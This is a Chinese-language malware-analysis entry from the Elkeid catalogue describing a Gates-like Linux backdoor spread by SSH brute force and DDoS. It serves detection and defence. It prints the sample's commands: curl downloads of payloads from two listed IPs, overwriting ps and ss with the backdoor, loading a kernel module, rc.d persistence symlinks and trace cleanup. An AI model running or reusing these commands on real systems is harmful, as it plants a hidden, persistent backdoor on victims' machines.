简述
该样本行为特征中,存在访问恶意IP,加载内核模块,建立后门等行为,与gates后门样本有相似行为,推测为通过ddos进入的后门样本
样本类型
后门,控制
elkeid 样本ID
elkeid_20221111_backdoor_4
捕获时间
- 20221111
最近活跃时间
- 20221115
关键词
S97DbSecuritySpt,bsd-port
已知入侵途径
- ssh暴破
- ddos
主要行为
-
重命名
- cp -f /usr/bin/service /usr/bin/.sshd
- cp -f /usr/bin/service /usr/bin/bsd-port/getty
- cp -f /usr/bin/apache /usr/bin/.sshd
- cp -f /usr/bin/apache /usr/bin/bsd-port/getty
- cp -f /usr/bin/bsd-port/getty /bin/ps
- cp -f /usr/bin/bsd-port/getty /bin/ss
- cp -f /usr/bin/bsd-port/getty /usr/bin/ps
- cp -f /usr/bin/bsd-port/getty /usr/bin/ss
-
加载内核模块
- insmod /usr/bin/bsd-port/xpacket.ko
- insmod /usr/bin/xpacket.ko
-
文件下载
- curl -O http://103.116.45.104:11230/service
- curl -O http://103.99.209.43:222/apache
-
创建恶意后门软连接
- ln -s /etc/init.d/DbSecuritySpt /etc/rc1.d/S97DbSecuritySpt
- ln -s /etc/init.d/DbSecuritySpt /etc/rc2.d/S97DbSecuritySpt
- ln -s /etc/init.d/DbSecuritySpt /etc/rc3.d/S97DbSecuritySpt
- ln -s /etc/init.d/DbSecuritySpt /etc/rc4.d/S97DbSecuritySpt
- ln -s /etc/init.d/DbSecuritySpt /etc/rc5.d/S97DbSecuritySpt
- ln -s /etc/init.d/selinux /etc/rc1.d/S99selinux
- ln -s /etc/init.d/selinux /etc/rc2.d/S99selinux
- ln -s /etc/init.d/selinux /etc/rc3.d/S99selinux
- ln -s /etc/init.d/selinux /etc/rc4.d/S99selinux
- ln -s /etc/init.d/selinux /etc/rc5.d/S99selinux
-
清理痕迹
- rm -rf service
IOC
- 103.116.45.104
- 103.99.209.43
参考链接
http://www.ttlsa.com/safe/linux-antivirus-action/
https://cloud.tencent.com/developer/article/1459350